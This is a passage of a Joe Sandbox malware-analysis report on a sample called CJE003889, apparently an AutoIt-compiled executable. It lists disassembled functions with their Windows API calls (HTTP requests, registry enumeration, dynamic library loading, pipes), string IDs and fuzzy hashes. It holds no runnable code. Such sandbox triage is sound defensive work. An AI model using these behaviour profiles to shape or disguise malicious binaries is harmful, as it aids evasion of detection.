                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                          • API String ID: 4237274167-1221869570
                                                          • Opcode ID: 326d55b50dff2decebc35b75a1517b14cb71feae9f89809489e01e80703a79ab
                                                          • Instruction ID: cc67606fec0a435668971a757714791edb9c2abd49cb7bc72fd27935dd6036be
                                                          • Opcode Fuzzy Hash: 326d55b50dff2decebc35b75a1517b14cb71feae9f89809489e01e80703a79ab
                                                          • Instruction Fuzzy Hash: 02918E71604301DFC710DF25C48495ABBF4EF89714F14896EF99A8B3A1DB31E90ADB92
                                                          APIs
                                                            • Part of subcall function 00C7FC86: _wcscpy.LIBCMT ref: 00C7FCA9
                                                          • _memset.LIBCMT ref: 00CC2B87
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CC2BB6
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CC2C69
                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00CC2C97
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                          • String ID: 0
                                                          • API String ID: 4152858687-4108050209
                                                          • Opcode ID: 0f06dd7d3c4debf70a1892fc283d1fe8d972f06e79c215e952a3bf79010a3035
                                                          • Instruction ID: 912dffcf72fc1097077a68d4cf18208d21f16009643ba4a755b5ae14db98a19c
                                                          • Opcode Fuzzy Hash: 0f06dd7d3c4debf70a1892fc283d1fe8d972f06e79c215e952a3bf79010a3035
                                                          • Instruction Fuzzy Hash: B351AF715083019BE724EE28D885F6FBBE4EF59354F140A2DF8A5D6290DB70CE449762
                                                          APIs
                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00CBD5D4
                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00CBD60A
                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00CBD61B
                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00CBD69D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                          • String ID: DllGetClassObject
                                                          • API String ID: 753597075-1075368562
                                                          • Opcode ID: 65dd6597d917eb5eb27484ab2f6b80f627f8487dbecba232d53b9e0ed9074c9f
                                                          • Instruction ID: 2d2613bb413558594547a5acad333deff50190f7fb3d3a755479184e5c1377ea
                                                          • Opcode Fuzzy Hash: 65dd6597d917eb5eb27484ab2f6b80f627f8487dbecba232d53b9e0ed9074c9f
                                                          • Instruction Fuzzy Hash: 1C417FB5600208EFDB15CF54C888BDA7BB9EF48310F1585ADBD0A9F255E7B1DA44CBA0
                                                          APIs
                                                          • _memset.LIBCMT ref: 00CC27C0
                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00CC27DC
                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00CC2822
                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00D25890,00000000), ref: 00CC286B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Menu$Delete$InfoItem_memset
                                                          • String ID: 0
                                                          • API String ID: 1173514356-4108050209
                                                          • Opcode ID: 976cd97d2d92c160861a556ca8178c5f59db1a7cec6132c82723b4c65709b1fa
                                                          • Instruction ID: 80486e8e70ebf39046ea5e93012f5007b64f176c4d08e196a491557dfac5c1d5
                                                          • Opcode Fuzzy Hash: 976cd97d2d92c160861a556ca8178c5f59db1a7cec6132c82723b4c65709b1fa
                                                          • Instruction Fuzzy Hash: F841AF722043419FDB20EF24D884F6ABBE8EF85314F144A2EF9A5972D1D730E905DB62
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00CDD7C5
                                                            • Part of subcall function 00C6784B: _memmove.LIBCMT ref: 00C67899
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: BuffCharLower_memmove
                                                          • String ID: cdecl$none$stdcall$winapi
                                                          • API String ID: 3425801089-567219261
                                                          • Opcode ID: 73052c664a90e4951567ff19a5999ccc1d682335481d4bb2a99a40ed28afb2eb
                                                          • Instruction ID: dec494cb03c416600f26a053f63d4290654ce34b5423c24eaa699b5aaacf9861
                                                          • Opcode Fuzzy Hash: 73052c664a90e4951567ff19a5999ccc1d682335481d4bb2a99a40ed28afb2eb
                                                          • Instruction Fuzzy Hash: D7317C71904215ABCB10EF54CC919EEB3B4BF14324B108A2AF976977D1DB31A909EB90
                                                          APIs
                                                            • Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22
                                                            • Part of subcall function 00CBAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00CBAABC
                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00CB8F14
                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00CB8F27
                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00CB8F57
                                                            • Part of subcall function 00C67BCC: _memmove.LIBCMT ref: 00C67C06
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$_memmove$ClassName
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 365058703-1403004172
                                                          • Opcode ID: ca97650483aa30a69b20d8c794ef4d3c69b06769d5573be36e807fe72baa6fba
                                                          • Instruction ID: 94428fa96092270f0073b4148591f9ed4785d1b70df4f021e03fff961beed067
                                                          • Opcode Fuzzy Hash: ca97650483aa30a69b20d8c794ef4d3c69b06769d5573be36e807fe72baa6fba
                                                          • Instruction Fuzzy Hash: 6721EE71A00108BBDB24ABA08C859FEB77DDF55320F104629B421961E1DE39490AEA20
                                                          APIs
                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CD184C
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CD1872
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00CD18A2
                                                          • InternetCloseHandle.WININET(00000000), ref: 00CD18E9
                                                            • Part of subcall function 00CD2483: GetLastError.KERNEL32(?,?,00CD1817,00000000,00000000,00000001), ref: 00CD2498
                                                            • Part of subcall function 00CD2483: SetEvent.KERNEL32(?,?,00CD1817,00000000,00000000,00000001), ref: 00CD24AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                          • String ID:
                                                          • API String ID: 3113390036-3916222277
                                                          • Opcode ID: 12f8c41a50b25e8aa3db0c974ad4cea91d0eaee749e30baf9208f6974b21855d
                                                          • Instruction ID: e4fe91947bb383e51c31443db59e21f1a75045eb7d59151bfcc232aafc93b7e4
                                                          • Opcode Fuzzy Hash: 12f8c41a50b25e8aa3db0c974ad4cea91d0eaee749e30baf9208f6974b21855d
                                                          • Instruction Fuzzy Hash: 7421BEB1500208BFEB11DB61DC85FBF77EDEB88754F15412BFA05A6280EA309E05A7A0
                                                          APIs
                                                            • Part of subcall function 00C61D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C61D73
                                                            • Part of subcall function 00C61D35: GetStockObject.GDI32(00000011), ref: 00C61D87
                                                            • Part of subcall function 00C61D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C61D91
                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00CE6461
                                                          • LoadLibraryW.KERNEL32(?), ref: 00CE6468
                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00CE647D
                                                          • DestroyWindow.USER32(?), ref: 00CE6485
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                          • String ID: SysAnimate32
                                                          • API String ID: 4146253029-1011021900
                                                          • Opcode ID: 7f38eb8afe15e5eb736b120d798dbf3d303a5f24a04700bbb718d395bc16c29b
                                                          • Instruction ID: 49a1e27b2e669ba500638be3e587f0a2ca48c5609e47edb79e0812b8976caa35
                                                          • Opcode Fuzzy Hash: 7f38eb8afe15e5eb736b120d798dbf3d303a5f24a04700bbb718d395bc16c29b
                                                          • Instruction Fuzzy Hash: BE21CF71220285BFEF108F66DC80EBB37ACEB683A4F104629FA20971E0D735DC41A720
                                                          APIs
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00CC6DBC
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CC6DEF
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00CC6E01
                                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00CC6E3B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: CreateHandle$FilePipe
                                                          • String ID: nul
                                                          • API String ID: 4209266947-2873401336
                                                          • Opcode ID: 2188722ce2b671584ee2784b7b27473e667745eeeb73d7cc5e0280f61a22d85f
                                                          • Instruction ID: 2a84191d62f9761b283fae5a95f6c64c720730d5939d6db53fb1f62b6cc07a13
                                                          • Opcode Fuzzy Hash: 2188722ce2b671584ee2784b7b27473e667745eeeb73d7cc5e0280f61a22d85f
                                                          • Instruction Fuzzy Hash: 8421817560020AABDB209F29DD44F9E77A4EF44720F20462DFDB1D72D0DB709951DB60
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00CC6E89
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CC6EBB
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00CC6ECC
                                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00CC6F06
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: CreateHandle$FilePipe
                                                          • String ID: nul
                                                          • API String ID: 4209266947-2873401336
                                                          • Opcode ID: 086d7d36e9c8ff8be6e4e7ae8d73ebdd16a4b7a3844c2dfffc1f948c5496145b
                                                          • Instruction ID: 9fd0975f25ea4b8f6dbd0526bb73d48e33a7b1c91ac976d5349baadf09daddd9
                                                          • Opcode Fuzzy Hash: 086d7d36e9c8ff8be6e4e7ae8d73ebdd16a4b7a3844c2dfffc1f948c5496145b
                                                          • Instruction Fuzzy Hash: 72219D79600305ABDB209F69DE44FAA77E8AF45720F200A1EF9B1D72D0DB70A951CB60
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 00CCAC54
                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00CCACA8
                                                          • __swprintf.LIBCMT ref: 00CCACC1
                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,00CEF910), ref: 00CCACFF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                          • String ID: %lu
                                                          • API String ID: 3164766367-685833217
                                                          • Opcode ID: 634928ea453c31f0e6627fc631ef102a351bed4cb3d5c5f0f63c574ee83294b4
                                                          • Instruction ID: 9cb5680ebb650de91c6285806b6e9931a703b4eb07e775da71dadd8cb27879c8
                                                          • Opcode Fuzzy Hash: 634928ea453c31f0e6627fc631ef102a351bed4cb3d5c5f0f63c574ee83294b4
                                                          • Instruction Fuzzy Hash: 56217131A0014DAFCB10DFA5C985EEE7BB8EF49714B0040A9F909DB252DB31EA45DB21
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 00CC1B19
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                          • API String ID: 3964851224-769500911
                                                          • Opcode ID: 790ace82a10c23a05c1c3034be7f436920b6e139422fa424d3dda63f90ff657f
                                                          • Instruction ID: 2001db0e1975c9e6eff3fd28795ecd5ff47203237bc5e9e9cbaed06e6bd421cd
                                                          • Opcode Fuzzy Hash: 790ace82a10c23a05c1c3034be7f436920b6e139422fa424d3dda63f90ff657f
                                                          • Instruction Fuzzy Hash: 1B115E749002089FCF44EF55D8629EEB7B5FF26308F244469D82467292EB329D0AEF54
                                                          APIs
                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00CDEC07
                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00CDEC37
                                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00CDED6A
                                                          • CloseHandle.KERNEL32(?), ref: 00CDEDEB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                          • String ID:
                                                          • API String ID: 2364364464-0
                                                          • Opcode ID: 558696c16712da4350f2db2124f92a3721228bba2c25e06be2b2da7849c43228
                                                          • Instruction ID: 48e2d26b29b707e6df6a1fad066419fd96cc9e776fdd834e3d4c5bf2c189d55c
                                                          • Opcode Fuzzy Hash: 558696c16712da4350f2db2124f92a3721228bba2c25e06be2b2da7849c43228
                                                          • Instruction Fuzzy Hash: 988160B1600301AFD720EF28C886F2AB7E5EF58710F04891DFA999B3D2DA70AD45CB51
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                          • String ID:
                                                          • API String ID: 1559183368-0
                                                          • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                          • Instruction ID: 45b9dc25b0b3f71891dfccb25994aa59bd4b0f02e602b3a7771e152f3f7d8ff1
                                                          • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                          • Instruction Fuzzy Hash: BC51C870A00B05DFDF24AF69D84466E77B6AF80329F248729F835962D0D7B0DE909B49
                                                          APIs
                                                            • Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22
                                                            • Part of subcall function 00CE0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CDFDAD,?,?), ref: 00CE0E31
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CE00FD
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CE013C
                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00CE0183
                                                          • RegCloseKey.ADVAPI32(?,?), ref: 00CE01AF
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00CE01BC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                          • String ID:
                                                          • API String ID: 3440857362-0
                                                          • Opcode ID: 4c6a70020c5de9d0e853b33d845811cb1ac547b03f2bdaa48ae4688496764b6c
                                                          • Instruction ID: 0f09994c31ed3df6bfc0482fb2b7a558a5cbcab4e9d2c56e87efe7a7c05e1c8d
                                                          • Opcode Fuzzy Hash: 4c6a70020c5de9d0e853b33d845811cb1ac547b03f2bdaa48ae4688496764b6c
                                                          • Instruction Fuzzy Hash: FD519C71208244AFC714EF58C881F6EB7E8FF84304F10492DF5958B2A2DB71E945DB92
                                                          APIs
                                                            • Part of subcall function 00C69837: __itow.LIBCMT ref: 00C69862
                                                            • Part of subcall function 00C69837: __swprintf.LIBCMT ref: 00C698AC
                                                          • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00CDD927
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00CDD9AA
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00CDD9C6
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00CDDA07
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00CDDA21
                                                            • Part of subcall function 00C65A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CC7896,?,?,00000000), ref: 00C65A2C
                                                            • Part of subcall function 00C65A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CC7896,?,?,00000000,?,?), ref: 00C65A50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 327935632-0
                                                          • Opcode ID: 7dda724804ac5c45c53a7e6ce4a5afb479749a794a7af5b486e3d085358f6118
                                                          • Instruction ID: b60f6c10ed84cf52e002a5cb313ca2f74866fe532876b0d53af894881c9283b6
                                                          • Opcode Fuzzy Hash: 7dda724804ac5c45c53a7e6ce4a5afb479749a794a7af5b486e3d085358f6118
                                                          • Instruction Fuzzy Hash: BE512A35A00209DFCB10EFA8C4949ADB7F4FF59310B14C06AE95AAB312DB31AE45DF50
                                                          APIs
                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00CCE61F
                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00CCE648
                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00CCE687
